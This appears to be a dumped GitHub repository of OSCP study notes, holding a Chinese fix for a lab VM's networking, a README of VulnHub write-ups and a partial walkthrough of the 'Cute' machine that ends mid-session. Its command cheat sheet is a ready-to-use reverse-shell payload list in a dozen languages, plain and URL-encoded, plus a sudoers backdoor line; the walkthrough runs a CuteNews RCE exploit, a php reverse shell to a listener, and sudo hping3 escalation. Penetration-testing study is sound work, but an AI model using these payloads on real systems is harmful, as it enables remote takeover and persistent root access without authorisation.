https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/wpwnvm/img-20220814181711.png -------------------------------------------------------------------------------- /FILES/wpwnvm/img-20220814182138.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/wpwnvm/img-20220814182138.png -------------------------------------------------------------------------------- /FILES/wpwnvm/img-20220814182653.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/wpwnvm/img-20220814182653.png -------------------------------------------------------------------------------- /FILES/wpwnvm/img-20220814182655.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/wpwnvm/img-20220814182655.png -------------------------------------------------------------------------------- /FILES/wpwnvm/img-20220814182827.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/wpwnvm/img-20220814182827.png -------------------------------------------------------------------------------- /FILES/wpwnvm/img-20220814182845.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/FILES/wpwnvm/img-20220814182845.png -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Aaron 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Other Documents/GetTargetIP.md: -------------------------------------------------------------------------------- 1 | # 靶机无法获取ip解决方案 2 | 1. 打开linux进入到引导界面之后按e 3 | ![Img](../FILES/GetTargetIP/img-20220723000210.png) 4 | ![Img](../FILES/GetTargetIP/img-20220723000215.png) 5 | 6 | 2. 找到linux那一行, 修改参数 7 | - 分两种情况, 一种是没有ro 8 | - 一种是有ro 9 | - 有ro需要改成rw 10 | - 没ro直接在尾部加上rw 11 | - 然后再加上init=/bin/bash 12 | 如图所示😁 13 | ![Img](../FILES/GetTargetIP/img-20220723000415.png) 14 | 3. 然后ctrl+x保存后就会进入到root单用户界面 15 | ![Img](../FILES/GetTargetIP/img-20220723000442.png) 16 | 4. ip a查看一下网卡信息, 在此处为ens33, 具体以实际为准 17 | ![Img](../FILES/GetTargetIP/img-20220723000518.png) 18 | 5. vi /etc/network/interfaces修改网卡信息 19 | - 如果没有完成第二步操作将无法修改信息 20 | - 修改网卡参数(从allow改成auto) 21 | - 此处我是为了方便识别, 将eth0/eth1/ens33都加上了 22 | ![Img](../FILES/GetTargetIP/img-20220723000644.png) 23 | ``` 24 | auto eth0 25 | iface eth0 inet dhcp 26 | auto eth1 27 | iface eth1 inet dhcp 28 | auto ens33 29 | iface ens33 inet dhcp 30 | ``` 31 | 然后:wq保存退出 32 | 6. 最后exec /sbin/init 33 | ![Img](../FILES/GetTargetIP/img-20220723000852.png) 34 | - 此处会显示Fail信息, 不用担心, 只不过是我刚刚加的网卡不在这个机器上而已 35 | ![Img](../FILES/GetTargetIP/img-20220723000932.png) 36 | 37 | 7. 再在kali上面扫描, 不出意外的话就已经有ip显示出来了 -------------------------------------------------------------------------------- /Other Documents/OSCP-Exam-Report-Template.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/Other Documents/OSCP-Exam-Report-Template.docx -------------------------------------------------------------------------------- /Other Documents/usually_command.md: -------------------------------------------------------------------------------- 1 | # usu_command 2 | 3 | 4 | ## 完整shell 5 | python -c "import pty;pty.spawn('/bin/bash')" 6 | 7 | 8 | ## 加入到sudoer 9 | echo "user ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers 10 | 11 | ## Reverse shell 12 | [Generate Reverse Shell Query](https://sentrywhale.com/documentation/reverse-shell) 13 | ### Bash 14 | ``` 15 | Common: 16 | bash -i >& /dev/tcp// 0>&1 17 | 0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196 18 | sh -i >& /dev/udp// 0>&1 19 | URL Encode: 20 | bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F%2F%200%3E%261 21 | 0%3C%26196%3Bexec%20196%3C%3E%2Fdev%2Ftcp%2F%2F%3B%20sh%20%3C%26196%20%3E%26196%202%3E%26196 22 | sh%20-i%20%3E%26%20%2Fdev%2Fudp%2F%2F%200%3E%261 23 | ``` 24 | ### Perl 25 | ``` 26 | perl -e 'use Socket;$i="";$p=;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 27 | perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,":");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 28 | For windows only: 29 | perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,":");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 30 | URL Encode: 31 | perl%20-e%20'use%20Socket%3B%24i%3D%22%22%3B%24p%3D%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B' 32 | perl%20-MIO%20-e%20'%24p%3Dfork%3Bexit%2Cif(%24p)%3B%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%22%3A%22)%3BSTDIN-%3Efdopen(%24c%2Cr)%3B%24~-%3Efdopen(%24c%2Cw)%3Bsystem%24_%20while%3C%3E%3B' 33 | For windows only: 34 | perl%20-MIO%20-e%20'%24p%3Dfork%3Bexit%2Cif(%24p)%3B%24c%3Dnew%20IO%3A%3ASocket%3A%3AINET(PeerAddr%2C%22%3A%22)%3BSTDIN-%3Efdopen(%24c%2Cr)%3B%24~-%3Efdopen(%24c%2Cw)%3Bsystem%24_%20while%3C%3E%3B' 35 | ``` 36 | ### Python 37 | ``` 38 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 39 | URL Encode: 40 | python%20-c%20'import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22%22%2C))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B' 41 | ``` 42 | ### Socat 43 | ``` 44 | socat tcp-connect:: exec:bash -li,pty,stderr,setsid,sigint,sane 45 | URL Encode: 46 | socat%20tcp-connect%3A%3A%20exec%3Abash%20-li%2Cpty%2Cstderr%2Csetsid%2Csigint%2Csane 47 | ``` 48 | ### PowerShell 49 | ``` 50 | powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("",);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() 51 | powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" 52 | URL Encode: 53 | powershell%20-NoP%20-NonI%20-W%20Hidden%20-Exec%20Bypass%20-Command%20New-Object%20System.Net.Sockets.TCPClient(%22%22%2C)%3B%24stream%20%3D%20%24client.GetStream()%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile((%24i%20%3D%20%24stream.Read(%24bytes%2C%200%2C%20%24bytes.Length))%20-ne%200)%7B%3B%24data%20%3D%20(New-Object%20-TypeName%20System.Text.ASCIIEncoding).GetString(%24bytes%2C0%2C%20%24i)%3B%24sendback%20%3D%20(iex%20%24data%202%3E%261%20%7C%20Out-String%20)%3B%24sendback2%20%20%3D%20%24sendback%20%2B%20%22PS%20%22%20%2B%20(pwd).Path%20%2B%20%22%3E%20%22%3B%24sendbyte%20%3D%20(%5Btext.encoding%5D%3A%3AASCII).GetBytes(%24sendback2)%3B%24stream.Write(%24sendbyte%2C0%2C%24sendbyte.Length)%3B%24stream.Flush()%7D%3B%24client.Close() 54 | powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient(''%2C)%3B%24stream%20%3D%20%24client.GetStream()%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile((%24i%20%3D%20%24stream.Read(%24bytes%2C%200%2C%20%24bytes.Length))%20-ne%200)%7B%3B%24data%20%3D%20(New-Object%20-TypeName%20System.Text.ASCIIEncoding).GetString(%24bytes%2C0%2C%20%24i)%3B%24sendback%20%3D%20(iex%20%24data%202%3E%261%20%7C%20Out-String%20)%3B%24sendback2%20%3D%20%24sendback%20%2B%20'PS%20'%20%2B%20(pwd).Path%20%2B%20'%3E%20'%3B%24sendbyte%20%3D%20(%5Btext.encoding%5D%3A%3AASCII).GetBytes(%24sendback2)%3B%24stream.Write(%24sendbyte%2C0%2C%24sendbyte.Length)%3B%24stream.Flush()%7D%3B%24client.Close()%22 55 | ``` 56 | ### PHP 57 | ``` 58 | php -r '$sock=fsockopen("",);exec("/bin/sh -i <&3 >&3 2>&3");' 59 | URL Encode: 60 | php%20-r%20'%24sock%3Dfsockopen(%22%22%2C)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B' 61 | ``` 62 | ### Ruby 63 | ``` 64 | ruby -rsocket -e'f=TCPSocket.open("",).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 65 | URL Encode: 66 | ruby%20-rsocket%20-e'f%3DTCPSocket.open(%22%22%2C).to_i%3Bexec%20sprintf(%22%2Fbin%2Fsh%20-i%20%3C%26%25d%20%3E%26%25d%202%3E%26%25d%22%2Cf%2Cf%2Cf)' 67 | ``` 68 | 69 | ### Netcat(nc) 70 | ``` 71 | nc -e /bin/sh 72 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc >/tmp/f 73 | rm -f x; mknod x p && nc 0x 74 | URL Encode: 75 | nc%20-e%20%2Fbin%2Fsh%20%20 76 | rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20%20%20%3E%2Ftmp%2Ff 77 | rm%20-f%20x%3B%20mknod%20x%20p%20%26%26%20nc%20%20%200%3Cx%20%7C%20%2Fbin%2Fbash%201%3Ex 78 | ``` 79 | 80 | ### FREEBSD 81 | ``` 82 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet > /tmp/f 83 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i |telnet > /tmp/f 84 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i |nc > /tmp/f 85 | URL Encode: 86 | rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Ctelnet%20%20%20%3E%20%2Ftmp%2Ff 87 | rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%20%7Ctelnet%20%20%20%3E%20%2Ftmp%2Ff 88 | rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%20%7Cnc%20%20%20%3E%20%2Ftmp%2Ff 89 | ``` 90 | ### Java 91 | ``` 92 | r = Runtime.getRuntime() 93 | p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp//;cat <&5 | while read line; do \\$line 2>&5 >&5; done"] as String[]) 94 | p.waitFor() 95 | URL Encode: 96 | r%20%3D%20Runtime.getRuntime()%0Ap%20%3D%20r.exec(%5B%22%2Fbin%2Fbash%22%2C%22-c%22%2C%22exec%205%3C%3E%2Fdev%2Ftcp%2F%2F%3Bcat%20%3C%265%20%7C%20while%20read%20line%3B%20do%20%5C%5C%24line%202%3E%265%20%3E%265%3B%20done%22%5D%20as%20String%5B%5D)%0Ap.waitFor() 97 | ``` 98 | 99 | 100 | 101 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # About 2 | ![Offensive](https://www.offensive-security.com/wp-content/uploads/2019/10/offsec-home-page.png) 3 | For prepare OSCP(Offensive Security Certified Processional) Notes 4 | # Platform 5 | 6 | ![VMware](https://img.shields.io/badge/VMware%20ESXI-7.0-orange) 7 | ![macOS](https://img.shields.io/badge/macOS-12.4-brightgreen) 8 | ![Kali](https://img.shields.io/badge/Kali%20Linux-2022.2-lightgrey) 9 | 10 | # Notes directory 11 | ![Total](https://img.shields.io/badge/TargetNotes-19-blueviolet) 12 | ### 21.July-26.July 13 | - Cute 14 | - [中文](https://aaroncaiii.github.io/Target%20Notes/Cute) 15 | - [EN](https://aaroncaiii.github.io/Target%20Notes-en/Cute) 16 | - [Download Cute](https://www.vulnhub.com/entry/bbs-cute-102,567/) 17 | - Development 18 | - [中文](https://aaroncaiii.github.io/Target%20Notes/Development) 19 | - [EN]((https://aaroncaiii.github.io/Target%20Notes-en/Development)) 20 | - [Download Development](https://www.vulnhub.com/entry/digitalworldlocal-development,280/) 21 | - FALL 22 | - [中文](https://aaroncaiii.github.io/Target%20Notes/FALL) 23 | - [EN](https://aaroncaiii.github.io/Target%20Notes-en/FALL) 24 | - [Download FALL](https://www.vulnhub.com/entry/digitalworldlocal-fall,726/) 25 | - Joy 26 | - [中文](https://aaroncaiii.github.io/Target%20Notes/Joy) 27 | - [EN](https://aaroncaiii.github.io/Target%20Notes-en/Joy) 28 | - [Download Joy](https://www.vulnhub.com/entry/digitalworldlocal-joy,298/) 29 | - SkyTower 30 | - [中文](https://aaroncaiii.github.io/Target%20Notes/SkyTower) 31 | - [Download SkyTower](https://www.vulnhub.com/entry/skytower-1,96/) 32 | - lampiao 33 | - [中文](https://aaroncaiii.github.io/Target%20Notes/lampiao) 34 | - [EN](https://aaroncaiii.github.io/Target%20Notes-en/lampiao) 35 | - [Download lampiao](https://download.vulnhub.com/lampiao/Lampiao.zip) 36 | - loly 37 | - [中文](https://aaroncaiii.github.io/Target%20Notes/loly) 38 | - [Download Loly]( https://download.vulnhub.com/loly/Loly.ova) 39 | - natraj 40 | - [中文](https://aaroncaiii.github.io/Target%20Notes/natraj) 41 | - [Download natraj](https://download.vulnhub.com/ha/Natraj.zip) 42 | - sar 43 | - [中文](https://aaroncaiii.github.io/Target%20Notes/sar) 44 | - [Download sar](https://download.vulnhub.com/sar/sar.zip) 45 | - solstice 46 | - [中文](https://aaroncaiii.github.io/Target%20Notes/solstice) 47 | - [Download solstice](https://download.vulnhub.com/sunset/solstice.ova) 48 | 49 | 50 | ### 28.July-2rd.Augest 51 | - Decoy 52 | - [中文](https://aaroncaiii.github.io/Target%20Notes/decoy) 53 | - [EN](https://aaroncaiii.github.io/Target%20Notes-en/decoy) 54 | - [Download Decoy](https://download.vulnhub.com/sunset/decoy.ova) 55 | - potato 56 | - [中文](https://aaroncaiii.github.io/Target%20Notes/potato) 57 | - [Download potato](https://download.vulnhub.com/potato/Potato.ova) 58 | - Tre 59 | - [中文](https://aaroncaiii.github.io/Target%20Notes/Tre) 60 | - [Download Tre](https://download.vulnhub.com/tre/Tre.zip) 61 | - oscp-voucher 62 | - [中文](https://aaroncaiii.github.io/Target%20Notes/oscp) 63 | - [Download oscp-voucher](https://download.vulnhub.com/infosecprep/oscp.zip) 64 | 65 | ### 4.Augest-9.Augest 66 | - Seppuku 67 | - [中文](https://aaroncaiii.github.io/Target%20Notes/Seppuku) 68 | - [Download Sepuku](https://download.vulnhub.com/seppuku/Seppuku.zip) 69 | ### 11.Augest-16.Augest 70 | - Inclusiveness 71 | - [中文](https://aaroncaiii.github.io/Target%20Notes/inclusiveness) 72 | - [Download](https://download.vulnhub.com/inclusiveness/Inclusiveness.ova) 73 | - Geisha 74 | - [中文](https://aaroncaiii.github.io/Target%20Notes/Geisha) 75 | - [Download](https://download.vulnhub.com/geisha/Geisha.zip) 76 | - Photographer 77 | - [中文](https://aaroncaiii.github.io/Target%20Notes/photographer) 78 | - [Download](https://download.vulnhub.com/photographer/Photographer.ova) 79 | - wpwnvm 80 | - [中文](https://aaroncaiii.github.io/Target%20Notes/wpwnvm) 81 | - [Download](https://download.vulnhub.com/wpwn/wpwnvm.zip) 82 | -------------------------------------------------------------------------------- /Target Notes-English Version/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/AaronCaiii/Notes/45e1f4e24aee71e0f9fd9b4e8155a0652db4a019/Target Notes-English Version/.DS_Store -------------------------------------------------------------------------------- /Target Notes-English Version/Cute.md: -------------------------------------------------------------------------------- 1 | # Cute 2 | ## Information Collect 3 | ### NMAP 4 | #### Full Ports Scanning 5 | ``` 6 | └─$ sudo nmap -p- 192.168.146.75 7 | [sudo] password for aaron: 8 | Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-25 11:42 HKT 9 | Nmap scan report for 192.168.146.75 10 | Host is up (0.00020s latency). 11 | Not shown: 65530 closed tcp ports (reset) 12 | PORT STATE SERVICE 13 | 22/tcp open ssh 14 | 80/tcp open http 15 | 88/tcp open kerberos-sec 16 | 110/tcp open pop3 17 | 995/tcp open pop3s 18 | MAC Address: 00:0C:29:1B:B0:20 (VMware) 19 | 20 | Nmap done: 1 IP address (1 host up) scanned in 10.06 seconds 21 | 22 | ``` 23 | #### Specify Scanning 24 | ``` 25 | └─$ sudo nmap -p22,80,88,110,995 -sV -A 192.168.146.75 26 | Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-25 11:42 HKT 27 | Nmap scan report for 192.168.146.75 28 | Host is up (0.00042s latency). 29 | 30 | PORT STATE SERVICE VERSION 31 | 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 32 | | ssh-hostkey: 33 | | 2048 04:d0:6e:c4:ba:4a:31:5a:6f:b3:ee:b8:1b:ed:5a:b7 (RSA) 34 | | 256 24:b3:df:01:0b:ca:c2:ab:2e:e9:49:b0:58:08:6a:fa (ECDSA) 35 | |_ 256 6a:c4:35:6a:7a:1e:7e:51:85:5b:81:5c:7c:74:49:84 (ED25519) 36 | 80/tcp open http Apache httpd 2.4.38 ((Debian)) 37 | |_http-title: Apache2 Debian Default Page: It works 38 | |_http-server-header: Apache/2.4.38 (Debian) 39 | 88/tcp open http nginx 1.14.2 40 | |_http-title: 404 Not Found 41 | |_http-server-header: nginx/1.14.2 42 | 110/tcp open pop3 Courier pop3d 43 | |_pop3-capabilities: IMPLEMENTATION(Courier Mail Server) UTF8(USER) PIPELINING UIDL USER TOP LOGIN-DELAY(10) STLS 44 | | ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US 45 | | Subject Alternative Name: email:postmaster@example.com 46 | | Not valid before: 2020-09-17T16:28:06 47 | |_Not valid after: 2021-09-17T16:28:06 48 | |_ssl-date: TLS randomness does not represent time 49 | 995/tcp open ssl/pop3 Courier pop3d 50 | |_pop3-capabilities: IMPLEMENTATION(Courier Mail Server) PIPELINING UTF8(USER) USER TOP LOGIN-DELAY(10) UIDL 51 | | ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US 52 | | Subject Alternative Name: email:postmaster@example.com 53 | | Not valid before: 2020-09-17T16:28:06 54 | |_Not valid after: 2021-09-17T16:28:06 55 | |_ssl-date: TLS randomness does not represent time 56 | MAC Address: 00:0C:29:1B:B0:20 (VMware) 57 | Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port 58 | Device type: general purpose 59 | Running: Linux 4.X|5.X 60 | OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 61 | OS details: Linux 4.15 - 5.6 62 | Network Distance: 1 hop 63 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 64 | 65 | TRACEROUTE 66 | HOP RTT ADDRESS 67 | 1 0.42 ms 192.168.146.75 68 | 69 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 70 | Nmap done: 1 IP address (1 host up) scanned in 20.22 seconds 71 | ``` 72 | ### Web Application Information Collect 73 | #### Nikto 74 | ``` 75 | └─$ nikto -h 192.168.146.75 76 | - Nikto v2.1.6 77 | --------------------------------------------------------------------------- 78 | + Target IP: 192.168.146.75 79 | + Target Hostname: 192.168.146.75 80 | + Target Port: 80 81 | + Start Time: 2022-07-25 11:44:49 (GMT8) 82 | --------------------------------------------------------------------------- 83 | + Server: Apache/2.4.38 (Debian) 84 | + The anti-clickjacking X-Frame-Options header is not present. 85 | + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS 86 | + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type 87 | + Cookie CUTENEWS_SESSION created without the httponly flag 88 | + No CGI Directories found (use '-C all' to force check all possible dirs) 89 | + Multiple index files found: /index.php, /index.html 90 | + Server may leak inodes via ETags, header found with file /, inode: 29cd, size: 5af83f7e950ce, mtime: gzip 91 | + Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 92 | + OSVDB-3092: /manual/: Web server manual found. 93 | + OSVDB-3268: /manual/images/: Directory indexing found. 94 | + OSVDB-3092: /LICENSE.txt: License file found may identify site software. 95 | + OSVDB-3233: /icons/README: Apache default file found. 96 | + 7916 requests: 0 error(s) and 11 item(s) reported on remote host 97 | + End Time: 2022-07-25 11:45:40 (GMT8) (51 seconds) 98 | --------------------------------------------------------------------------- 99 | + 1 host(s) tested 100 | ``` 101 | ##### Find index.php 102 | ![Img](../FILES/Cute/img-20220725114624.png) 103 | ##### We can register a users 104 | ##### Enter Register User Interface 105 | ![Img](../FILES/Cute/img-20220725114706.png) 106 | ##### But verification code can't load 107 | ##### Check source code for this page 108 | ![Img](../FILES/Cute/img-20220725114756.png) 109 | ##### Find captcha.php 110 | ![Img](../FILES/Cute/img-20220725114807.png) 111 | ##### Jump to captcha.php and we can got the verification code 112 | ##### Successful Login to System 113 | ![Img](../FILES/Cute/img-20220725114835.png) 114 | ##### Found the CuteNews version at 2.1.2 115 | ![Img](../FILES/Cute/img-20220725114909.png) 116 | ##### Search at google and found the RCE Vulnerability 117 | ## Vulnerability Exploit 118 | ``` 119 | └─$ searchsploit cutenews 2.1.2 120 | ---------------------------------------------------------------------------------------- --------------------------------- 121 | Exploit Title | Path 122 | ---------------------------------------------------------------------------------------- --------------------------------- 123 | CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit) | php/remote/46698.rb 124 | CuteNews 2.1.2 - Arbitrary File Deletion | php/webapps/48447.txt 125 | CuteNews 2.1.2 - Authenticated Arbitrary File Upload | php/webapps/48458.txt 126 | CuteNews 2.1.2 - Remote Code Execution | php/webapps/48800.py 127 | ---------------------------------------------------------------------------------------- --------------------------------- 128 | Shellcodes: No Results 129 | ``` 130 | ##### We can found the exploit at expolitdb, use searchsploit download that 131 | ``` 132 | └─$ searchsploit -m php/webapps/48800.py 133 | Exploit: CuteNews 2.1.2 - Remote Code Execution 134 | URL: https://www.exploit-db.com/exploits/48800 135 | Path: /usr/share/exploitdb/exploits/php/webapps/48800.py 136 | File Type: Python script, ASCII text executable 137 | 138 | Copied to: /home/aaron/Desktop/Cute-192.168.146.75/48800.py 139 | 140 | 141 | 142 | ┌──(aaron㉿aacai)-[~/Desktop/Cute-192.168.146.75] 143 | └─$ ls 144 | 48800.py LANs.py 145 | └─$ python3 48800.py 146 | 147 | 148 | 149 | _____ __ _ __ ___ ___ ___ 150 | / ___/_ __/ /____ / |/ /__ _ _____ |_ | < / |_ | 151 | / /__/ // / __/ -_) / -_) |/|/ (_-< / __/_ / / / __/ 152 | \___/\_,_/\__/\__/_/|_/\__/|__,__/___/ /____(_)_(_)____/ 153 | ___ _________ 154 | / _ \/ ___/ __/ 155 | / , _/ /__/ _/ 156 | /_/|_|\___/___/ 157 | 158 | 159 | 160 | 161 | [->] Usage python3 expoit.py 162 | 163 | Enter the URL> http://192.168.146.75/ 164 | ================================================================ 165 | Users SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN 166 | ================================================================ 167 | [-] No hashes were found skipping!!! 168 | ================================================================ 169 | 170 | ============================= 171 | Registering a users 172 | ============================= 173 | 174 | ┌──(aaron㉿aacai)-[~/Desktop/Cute-192.168.146.75] 175 | └─$ 176 | 177 | ``` 178 | ##### But we can't execution this python file in this moment, view the python code 179 | ![Img](../FILES/Cute/img-20220725115151.png) 180 | ##### We didn't see the CuteNews Path when we visit website or jump to any other path, so remove that and try again 181 | ![Img](../FILES/Cute/img-20220725115318.png) 182 | ##### It's working 183 | ``` 184 | command > whoami 185 | www-data 186 | 187 | command > ls 188 | avatar_55Y2xTic4I_55Y2xTic4I.php 189 | avatar_ET3TpbEJQk_ET3TpbEJQk.php 190 | avatar_IgJLU8OSMX_IgJLU8OSMX.php 191 | avatar_PoKxESSE4D_PoKxESSE4D.php 192 | avatar_RvFcklLkzE_RvFcklLkzE.php 193 | avatar_VvgU5CZIce_VvgU5CZIce.php 194 | avatar_cruDW9A0zh_cruDW9A0zh.php 195 | avatar_rwRemM6TLd_message2.jpg 196 | index.html 197 | ``` 198 | ##### Process Reverse Shell 199 | ``` 200 | php -r '$sock=fsockopen("192.168.146.50",4444);exec("/bin/sh -i <&3 >&3 2>&3");' 201 | ``` 202 | 203 | ![Img](../FILES/Cute/img-20220725115522.png) 204 | ##### Get the common shell 205 | ## Privilege Escalation 206 | #### Download linpeas from local and execPrivilege Escalationute 207 | ``` 208 | www-data@cute:/tmp$ wget http://192.168.146.50/linpeas.sh 209 | wget http://192.168.146.50/linpeas.sh 210 | --2022-07-23 14:30:48-- http://192.168.146.50/linpeas.sh 211 | Connecting to 192.168.146.50:80... connected. 212 | HTTP request sent, awaiting response... 200 OK 213 | Length: 777005 (759K) [text/x-sh] 214 | Saving to: 'linpeas.sh' 215 | 216 | linpeas.sh 100%[===================>] 758.79K --.-KB/s in 0.02s 217 | 218 | 2022-07-23 14:30:48 (43.2 MB/s) - 'linpeas.sh' saved [777005/777005] 219 | 220 | ``` 221 | ##### Got the useful information from linpeas 222 | ``` 223 | ╔══════════╣ CVEs Check 224 | Vulnerable to CVE-2021-4034 225 | 226 | ╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d 227 | ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid 228 | Matching Defaults entries for www-data on cute: 229 | env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin 230 | 231 | User www-data may run the following commands on cute: 232 | (root) NOPASSWD: /usr/sbin/hping3 --icmp 233 | (ALL) NOPASSWD: ALL 234 | 235 | ``` 236 | ##### As you can see, we can use hping3 without password when we use sudo 237 | ``` 238 | www-data@cute:/tmp$ sudo /usr/sbin/hping3 239 | sudo /usr/sbin/hping3 240 | hping3> id 241 | id 242 | uid=0(root) gid=0(root) groups=0(root) 243 | hping3> whoami 244 | 